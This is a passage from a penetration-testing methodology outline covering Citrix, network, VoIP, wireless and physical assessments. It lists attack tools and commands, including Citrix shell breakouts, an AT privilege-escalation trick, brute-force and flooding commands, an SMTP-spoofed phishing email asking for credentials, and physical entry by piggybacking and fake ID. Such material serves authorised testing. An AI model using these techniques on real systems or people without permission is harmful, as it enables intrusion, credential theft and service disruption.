19.6.1. Attack Tools. Web browse to the Cisco device: http://<IP>. ./ios-w3-vul fetch > /tmp/router.txt

19.6.2. Common Vulnerabilities and Exposures (CVE) Information: vulnerability and exploit information relating to these products can be found here:

19.7. Configuration Files.

19.7.1. Configuration files explained. The line that reads "enable password router", where "router" is the password, is the TTY console password, which is superseded by the enable secret password for remote access. Password encryption utilised. Configuration testing tools: Nipper, fwauto (Beta).

19.8. References.

19.8.1. Cisco IOS Exploitation Techniques

20. Citrix Specific Testing

20.1. Citrix provides remote access services to multiple users across a wide range of platforms. The following information, which I have put together, will hopefully help you conduct a vulnerability assessment/penetration test against Citrix.

20.2. Enumeration

20.2.1. web search Google (GHDB) ext:ica inurl:citrix/metaframexp/default/login.asp [WFClient] Password= filetype:ica inurl:citrix/metaframexp/default/login.asp? ClientDetection=On inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login" inurl:/Citrix/Nfuse17/ inurl:Citrix/MetaFrame/default/default.aspx Google Hacks (Author Discovered) filetype:ica Username= inurl:Citrix/AccessPlatform/auth/login.aspx inurl:/Citrix/AccessPlatform/ inurl:LogonAgent/Login.asp inurl:/CITRIX/NFUSE/default/login.asp inurl:/Citrix/NFuse161/login.asp inurl:/Citrix/NFuse16 inurl:/Citrix/NFuse151/ allintitle:MetaFrame XP Login allintitle:MetaFrame Presentation Server Login inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On allintitle:Citrix(R) NFuse(TM) Classic Login Yahoo originurlextension:ica

20.2.2. site search Manual review web page for useful information review source for web page

20.2.3. generic nmap -A -PN -p 80,443,1494 ip_address amap -bqv ip_address port_no.

20.2.4. citrix specific perl ip_address enum.js enum.js apps TCPBrowserAdress=ip_address connect.js connect.js TCPBrowserAdress=ip_address Application=advertised-application Citrix-pa-scan perl ip_address [timeout] > pas.wri pabrute.c ./pabrute pubapp list app_list ip_address

20.2.5. Default Ports TCP Citrix XML Service Advanced Management Console Citrix SSL Relay ICA sessions Server to server Management Console to server Session Reliability (Auto-reconnect) License Management Console License server UDP Clients to ICA browser service Server-to-server

20.2.6. nmap nse scripts citrix-enum-apps nmap -sU --script=citrix-enum-apps -p 1604 <host> citrix-enum-apps-xml nmap --script=citrix-enum-apps-xml -p 80,443 <host> citrix-enum-servers nmap -sU --script=citrix-enum-servers -p 1604 citrix-enum-servers-xml nmap --script=citrix-enum-servers-xml -p 80,443 <host> citrix-brute-xml nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>

20.3. Scanning

20.3.1. Nessus Plugins CGI abuses CGI abuses : Cross Site Scripting (XSS) Misc. Service Detection Web Servers Windows

20.3.2. Nikto: perl -host ip_address -port port_no.

20.4. Exploitation

20.4.1. Alter default .ica files InitialProgram=cmd.exe InitialProgram=explorer.exe

20.4.2. Enumerate and Connect For applications identified by Citrix-pa-scan Pas For published applications with a Citrix client when the master browser is non-public. Citrix-pa-proxy

20.4.3. Manual Testing. Create batch file (cmd.bat). Windows Script Host file (cmd.vbs):
Option Explicit
Dim objShell
Set objShell = CreateObject("WScript.Shell")
objShell.Run "%comspec% /k"
WScript.Quit
Alternative functionality: iKat Integrated Kiosk Attack Tool. AT command - privilege escalation: AT HH:MM /interactive "cmd.exe" or AT HH:MM /interactive %comspec% /k. Keyboard Shortcuts/Hotkeys: Ctrl + h – View History; Ctrl + n – New Browser; Shift + Left Click – New Browser; Ctrl + o – Internet Address (browse feature); Ctrl + p – Print (to file); Right Click (Shift + F10); F1 – Jump to URL; SHIFT+F1: Local Task List; SHIFT+F2: Toggle Title Bar; SHIFT+F3: Close Remote Application; CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del; CTRL+F2: Remote Task List; CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC; ALT+F2: Cycle through programs; ALT+PLUS: Alt+TAB; ALT+MINUS: ALT+SHIFT+TAB

20.5. Brute Force

20.5.1. bforce.js: bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2 or bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt

20.6. Review Configuration Files

20.6.1. Application server configuration file appsrv.ini Location World writeable Review other files Sample file

20.6.2. Program Neighborhood configuration file pn.ini Location Review other files Sample file

20.6.3. Citrix ICA client configuration file wfclient.ini Location

20.7. References

20.7.1. Vulnerabilities: Art of Hacking, Common Vulnerabilities and Exposures (CVE), OSVDB, Secunia, SecurityFocus

20.7.2. Support Citrix Knowledge Base Thinworld

20.7.3. Exploits Milw0rm Art of Hacking Citrix

20.7.4. Tools Resource: zip file containing the majority of the tools mentioned in this article, for easy download/access.

21. Network Backbone

21.1. Generic Toolset

21.1.1. Wireshark (formerly Ethereal). Passive sniffing: usernames/passwords, email, FTP, HTTP, HTTPS, RDP, VOIP, other. Filters: ip.src == ip_address; ip.dst == ip_address; tcp.dstport == port_no.; !(ip.addr == ip_address); (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)

21.1.2. Cain & Abel Active Sniffing ARP Cache Poisoning DNS Poisoning Routing Protocols

21.1.3. Cisco-Torch ./ <options> <IP,hostname,network> or ./ <options> -F <hostlist>

21.1.4. NTP-Fingerprint perl -t [ip_address]

21.1.5. Yersinia

21.1.6. p0f ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]

21.1.7. Manual Check (Credentials required)

21.1.8. MAC Spoofing mac address changer for windows macchanger Random Mac Address:- macchanger -r eth0 madmacs smac TMAC

22. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.

22.1. Password Attacks

22.1.1. Known Accounts Identified Passwords Unidentified Hashes

22.1.2. Default Accounts Identified Passwords Unidentified Hashes

22.2. Exploits

22.2.1. Successful Exploits Accounts Passwords Groups Other Details Services Backdoor Connectivity

22.2.2. Unsuccessful Exploits

22.2.3. Resources. Securiteam: exploits are sorted by year and must be downloaded individually. SecurityForest: updated via CVS after initial install. GovernmentSecurity: need to create an account to obtain access. Red Base Security: Oracle exploit site only. Wireless Vulnerabilities & Exploits (WVE): wireless exploit site. PacketStorm Security: exploits downloadable by month and year but no indexing carried out. SecWatch: exploits sorted by year and month, download separately. SecurityFocus: exploits must be downloaded individually. Metasploit: install and regularly update via svn. Milw0rm: exploit archive indexed and sorted by port, download as a whole - the one to go for!

22.3. Tools

22.3.1. Metasploit Free Extra Modules local copy

22.3.2. Manual SQL Injection Understanding SQL Injection SQL Injection walkthrough SQL Injection by example Blind SQL Injection Advanced SQL Injection in SQL Server More Advanced SQL Injection Advanced SQL Injection in Oracle databases SQL Cheatsheets Untitled

22.3.3. SQL Power Injector

22.3.4. SecurityForest

22.3.5. SPI Dynamics WebInspect

22.3.6. Core Impact

22.3.7. Cisco Global Exploiter

22.3.8. PIXDos perl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=M AC] [--destmac=MAC] [--port=n]

22.3.9. CANVAS

22.3.10. Inguma

23. Server Specific Tests

23.1. Databases

23.1.1. Direct Access Interrogation. MS SQL Server: ports, version, osql. Oracle: ports, TNS Listener, SQL Plus, default account/passwords, default SIDs. MySQL: ports, version, users/passwords. DB2. Informix. Sybase. Other.

23.1.2. Scans Default Ports Non-Default Ports Instance Names Versions

23.1.3. Password Attacks Sniffed Passwords Cracked Passwords Hashes Direct Access Guesses

23.1.4. Vulnerability Assessment Automated Reports Vulnerabilities Manual Patch Levels Confirmed Vulnerabilities

23.2. Mail

23.2.1. Scans

23.2.2. Fingerprint Manual Automated

23.2.3. Spoofable. Telnet spoof:
telnet target_IP 25
helo target.com
mail from: [email protected]
to: [email protected]: [email protected]: []
X-Originating-Email: [[email protected]]
MIME-Version: 1.0
To: <[email protected]>
From: < [email protected] >
Subject: Important! Account check required
Content-Type: text/html
Content-Transfer-Encoding: 7bit
Dear Valued Customer,The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=></a>Online Security Manager.
Target [email protected]

23.2.4. Relays

23.3. VPN

23.3.1. Scanning: 500/UDP IPSEC; 1723/TCP PPTP; 443/TCP SSL. nmap -sU -PN -p 500; ipsecscan

23.3.2. Fingerprinting: ike-scan --showbackoff

23.3.3. PSK Crack: ikeprobe, sniff for responses with Cain & Abel, or ikecrack

23.4. Web

23.4.1. Vulnerability Assessment Automated Reports Vulnerabilities Manual Patch Levels Confirmed Vulnerabilities

23.4.2. Permissions
PUT /test.txt HTTP/1.0
CONNECT HTTP/1.0
POST HTTP/1.0
Content-Type: text/plain
Content-Length: 6

23.4.3. Scans

23.4.4. Fingerprinting Other HTTP Commands Modules File Extensions HTTPS Commands Commands File Extensions

23.4.5. Directory Traversal

24. VoIP Security

24.1. Sniffing Tools

24.1.1. AuthTool

24.1.2. Cain & Abel

24.1.3. Etherpeek

24.1.4. NetDude

24.1.5. Oreka

24.1.6. PSIPDump

24.1.7. SIPomatic

24.1.8. SIPv6 Analyzer

24.1.9. UCSniff

24.1.10. VoiPong

24.1.11. VOMIT

24.1.12. Wireshark

24.1.13. WIST - Web Interface for SIP Trace

24.2. Scanning and Enumeration Tools

24.2.1. enumIAX

24.2.2. fping

24.2.3. IAX Enumerator

24.2.4. iWar

24.2.5. Nessus

24.2.6. Nmap

24.2.7. SIP Forum Test Framework (SFTF)

24.2.8. SIPcrack

24.2.9. sipflanker python 192.168.1-254

24.2.10. SIP-Scan

24.2.11. SIP.Tastic

24.2.12. SIPVicious

24.2.13. SiVuS

24.2.14. SMAP smap IP_Address/Subnet_Mask smap -o IP_Address/Subnet_Mask smap -l IP_Address

24.2.15. snmpwalk

24.2.16. VLANping

24.2.17. VoIPAudit

24.2.18. VoIP GHDB Entries

24.2.19. VoIP Voicemail Database

24.3. Packet Creation and Flooding Tools

24.3.1. H.323 Injection Files

24.3.2. H225regreject

24.3.3. IAXHangup

24.3.4. IAXAuthJack

24.3.5. IAX.Brute

24.3.6. IAXFlooder ./iaxflood sourcename destinationname numpackets

24.3.7. INVITE Flooder ./inviteflood interface target_user target_domain ip_address_target no_of_packets

24.3.8. kphone-ddos

24.3.9. RTP Flooder

24.3.10. rtpbreak

24.3.11. Scapy

24.3.12. Seagull

24.3.13. SIPBomber

24.3.14. SIPNess

24.3.15. SIPp

24.3.16. SIPsak
Tracing paths: sipsak -T -s sip:[email protected]
Options request: sipsak -vv -s sip:[email protected]
Query registered bindings: sipsak -I -C empty -a password -s sip:[email protected]

24.3.17. SIP-Send-Fun

24.3.18. SIPVicious

24.3.19. Spitter

24.3.20. TFTP Brute Force perl <tftpserver> <filelist> <maxprocesses>

24.3.21. UDP Flooder ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets

24.3.22. UDP Flooder (with VLAN Support) ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets

24.3.23. Voiphopper

24.4. Fuzzing Tools

24.4.1. Asteroid

24.4.2. Codenomicon VoIP Fuzzers

24.4.3. Fuzzy Packet

24.4.4. Mu Security VoIP Fuzzing Platform

24.4.5. ohrwurm RTP Fuzzer

24.4.6. PROTOS H.323 Fuzzer

24.4.7. PROTOS SIP Fuzzer

24.4.8. SIP Forum Test Framework (SFTF)

24.4.9. Sip-Proxy

24.4.10. Spirent ThreatEx

24.5. Signaling Manipulation Tools

24.5.1. AuthTool ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v

24.5.2. BYE Teardown

24.5.3. Check Sync Phone Rebooter

24.5.4. RedirectPoison ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:;line=xtrfgy>"

24.5.5. Registration Adder

24.5.6. Registration Eraser

24.5.7. Registration Hijacker

24.5.8. SIP-Kill

24.5.9. SIP-Proxy-Kill

24.5.10. SIP-RedirectRTP

24.5.11. SipRogue

24.5.12. vnak

24.6. Media Manipulation Tools

24.6.1. RTP InsertSound ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

24.6.2. RTP MixSound ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

24.6.3. RTPProxy

24.6.4. RTPInject

24.7. Generic Software Suites

24.7.1. OAT Office Communication Server Tool Assessment

24.7.2. EnableSecurity VOIPPACK. Note: add-on for Immunity Canvas.

24.8. References

24.8.1. URLs: Common Vulnerabilities and Exposures (CVE): vulnerability and exploit information relating to these products can be found here: Default Passwords; Hacking Exposed VoIP Tool Pre-requisites; VoIPsa

24.8.2. White Papers An Analysis of Security Threats and Tools in SIP-Based VoIP Systems An Analysis of VoIP Security Threats and Tools Hacking VoIP Exposed Security testing of SIP implementations SIP Stack Fingerprinting and Stack Difference Attacks Two attacks against VoIP VoIP Attacks! VoIP Security Audit Program (VSAP)

25. Wireless Penetration

25.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester (and hence the customer) a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting with the customer should allow you to estimate the timescales required to carry out the assessment.

25.1.1. Site Map RF Map Lines of Sight Signal Coverage Physical Map Triangulate APs Satellite Imagery

25.1.2. Network Map MAC Filter Authorised MAC Addresses Reaction to Spoofed MAC Addresses Encryption Keys utilised WEP WPA/PSK 802.1x Access Points ESSID BSSIDs Wireless Clients MAC Addresses Intercepted Traffic

25.2. Wireless Toolkit

25.2.1. Wireless Discovery Aerosol Airfart Aphopper Apradar BAFFLE inSSIDer iWEPPro karma KisMAC-ng Kismet MiniStumbler Netstumbler Vistumbler Wellenreiter Wifi Hopper WirelessMon WiFiFoFum

25.2.2. Packet Capture Airopeek Airpcap Airtraf Apsniff Cain Commview Ettercap Netmon nmwifi Wireshark

25.2.3. EAP Attack tools: eapmd5pass. eapmd5pass -w dictionary_file -r eapmd5-capture.dump

25.2.4. Leap Attack Tools asleap thc leap cracker anwrap

25.2.5. WEP/WPA Password Attack Tools: Airbase, Aircrack-ptw, Aircrack-ng, Airsnort, cowpatty, FiOS Wireless Key Calculator, iWifiHack, KisMAC-ng, Rainbow Tables, wep attack, wep crack, wzcook

25.2.6. Frame Generation Software: Airgobbler, airpwn, Airsnarf, Commview, fake ap, void 11, wifi tap (wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p]] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]), FreeRADIUS - Wireless Pwnage Edition

25.2.7. Mapping Software Online Mapping WIGLE Skyhook Tools Knsgem

25.2.8. File Format Conversion Tools ns1 recovery and conversion tool warbable warkizniz warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename] ivstools

25.2.9. IDS Tools WIDZ War Scanner Snort-Wireless AirDefense AirMagnet

25.3. WLAN discovery

25.3.1. Unencrypted WLAN Visible SSID Sniff for IP range Hidden SSID Deauth client

25.3.2. WEP encrypted WLAN Visible SSID WEPattack Hidden SSID Deauth client

25.3.3. WPA / WPA2 encrypted WLAN Deauth client Capture EAPOL handshake

25.3.4. LEAP encrypted WLAN Deauth client Break LEAP

25.3.5. 802.1x WLAN Create Rogue Access Point Airsnarf fake ap Hotspotter Karma Linux rogue AP

25.3.6. Resources. URLs: Russix, Wireless Vulnerabilities and Exploits (WVE). White Papers: Weaknesses in the Key Scheduling Algorithm of RC4; 802.11b Firmware-Level Attacks; Wireless Attacks from an Intrusion Detection Perspective; Implementing a Secure Wireless Network for a Windows Environment; Breaking 104 bit WEP in less than 60 seconds; PEAP Shmoocon2008 Wright & Antoniewicz; Active behavioral fingerprinting of wireless devices. Common Vulnerabilities and Exposures (CVE): vulnerability and exploit information relating to these products can be found here:

26. Physical Security

26.1. Building Security

26.1.1. Meeting Rooms Check for active network jacks. Check for any information in room.

26.1.2. Lobby Check for active network jacks. Does receptionist/guard leave lobby? Accessible printers? Print test page. Obtain phone/personnel listing.

26.1.3. Communal Areas Check for active network jacks. Check for any information in room. Listen for employee conversations.

26.1.4. Room Security Resistance of lock to picking. What type of locks are used in building? Pin tumblers, padlocks, cabinet locks, dimple keys, proximity sensors? Ceiling access areas. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?

26.1.5. Windows Check windows/doors for visible intruder alarm sensors. Check visible areas for sensitive information. Can you video users logging on?

26.2. Perimeter Security

26.2.1. Fence Security Attempt to verify that the whole of the perimeter fence is unbroken.

26.2.2. Exterior Doors If there is no perimeter fence, then determine if exterior doors are secured, guarded and monitored etc.

26.2.3. Guards Patrol Routines Analyse patrol timings to ascertain if any holes exist in the coverage. Communications Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physical intrusion.

26.3. Entry Points

26.3.1. Guarded Doors Piggybacking Attempt to closely follow employees into the building without having to show valid credentials. Fake ID Attempt to use fake ID to gain access. Access Methods Test 'out of hours' entry methods

26.3.2. Unguarded Doors Identify all unguarded entry points. Are doors secured? Check locks for resistance to lock picking.

26.3.3. Windows Check windows/doors for visible intruder alarm sensors. Attempt to bypass sensors.

26.4. Office Waste

26.4.1. Dumpster Diving Attempt to retrieve any useful information from ToE refuse. This may include: printed documents, books, manuals, laptops, PDAs, USB memory devices, CDs, floppy discs, etc.

27. Final Report - template

28. Contributors

28.1. Matt Byrne (

28.1.1. Matt contributed the majority of the Wireless section.

28.2. Arvind Doraiswamy (

28.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.

28.3. Lee Lawson (

28.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.

28.4. Nabil OUCHN (